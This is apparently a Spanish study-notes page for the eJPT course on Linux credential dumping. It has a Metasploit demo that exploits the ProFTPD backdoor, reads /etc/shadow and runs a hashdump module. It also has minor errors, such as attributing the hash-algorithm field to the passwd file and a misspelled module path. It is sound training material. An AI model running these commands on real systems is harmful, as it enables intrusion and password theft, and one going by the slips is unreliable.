eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Dumping Linux Password Hashes
  • Linux Password Hashes
  • Linux Password Hashes
  • Demo: Linux Password Hashes
  • Quiz
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: System/Host Based Attacks

Linux Credential Dumping

Dumping Linux Password Hashes

En esta seccion exploraremos procesos de volcado de hash de contraseñas de Linux.

Linux Password Hashes

Linux tiene soporte multiusuario y, como resultado, varios usuarios pueden acceder al sistema simultáneamente. Esto puede verse como una ventaja y una desventaja desde una perspectiva de seguridad, ya que varias cuentas ofrecen múltiples vectores de acceso para los atacantes y, por lo tanto, aumentan el riesgo general del servidor.

Toda la información de todas las cuentas en Linux se almacena en el archivo passwd ubicado en: /etc/passwd

No podemos ver las contraseñas de los usuarios en el archivo passwd porque están cifradas y cualquier usuario del sistema puede leer el archivo passwd.

Todas las contraseñas cifradas de los usuarios se almacenan en el archivo oculto. se puede encontrar en el siguiente directorio: /etc/shadow. El archivo contiene una lista de cuentas de usuario y sus contraseñas hash encriptadas.

Solo el usuario root puede acceder y leer el archivo oculto; esta es una característica de seguridad muy importante ya que evita que otras cuentas en el sistema accedan a las contraseñas hash.

Linux Password Hashes

El archivo passwd nos brinda información con respecto al algoritmo hash que se está utilizando y el hash de la contraseña, esto es muy útil ya que podemos determinar el tipo de algoritmo hash que se está utilizando y su potencia. Podemos determinar esto mirando el número después del nombre de usuario encapsulado por el símbolo del dólar ($).

Value
Hashing Algorithm

$1

MD5

$2

Blowfish

$5

SHA-256

$6

SHA-512

Demo: Linux Password Hashes

# Enumeracion de servicios en el equipo
nmap -sV <Target>
# Buscamos alguna Vulnerabilidad del algun servicio encontrado
searchsploit ProFTPD
# Establecemos una variable global para RHOSTS
msf5> setg RHOSTS <Target>
msf5> search proftpd
msf5> use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
# Obtendremos una sesion Shell

/bin/bash -i
# Control Z / Hacemos que la sesion se ejecute en segundo plano
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > sessions
# Actualizar la sesiion a una session de meterpreter
# Hara que la sesion sea mas facil
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > sessions -u 1

# En la comuna Type, verificara el tipo de session
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > sessions

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > sessions 2
meterpreter > sysinfo
meterpreter > getuid

# Valcar la constraseña
meterpreter > cat /etc/shadow


# Una tecnica que podemos utilizar para descifrar la contraseana es por medio
# del modulo de metasploit y el otro es por una tecnica de descifrado
# Poner en Segundo Plano

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > search hashdump

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > use post/linux/gather/hasdump
msf5 post(linux/gather/hasdump) > show options
msf5 post(linux/gather/hasdump) > set SESSION <ID de Session meterpreter>
msf5 post(linux/gather/hasdump) > run
# Automatica va a volcar y descifrar la contrasena, y le dara la ruta de 
# donde se encuentra el password

Quiz

PreviousLinux Privilege EscalationNextConclusion

Last updated 1 year ago